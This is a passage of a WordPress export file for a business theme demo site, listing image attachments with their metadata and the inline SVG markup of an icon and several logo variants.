		<wp:post_date_gmt><![CDATA[2020-09-03 10:08:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[send]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>253</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/send.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/04/send.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-4/04_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:33:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>383</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:33:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:33:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>217</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/04_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#C0FFBF"></stop>
	<stop offset="1" style="stop-color:#55BB53"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_header_builders/header-5/05_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:43:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>389</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:43:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:43:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>267</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/05_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="4.025560e-07" style="stop-color:#CAF7F1"></stop>
	<stop offset="1" style="stop-color:#74C7BC"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_footer_builders/footer-1/01_white/</link>
		<pubDate>Fri, 04 Sep 2020 03:40:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>404</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 03:40:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 03:40:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  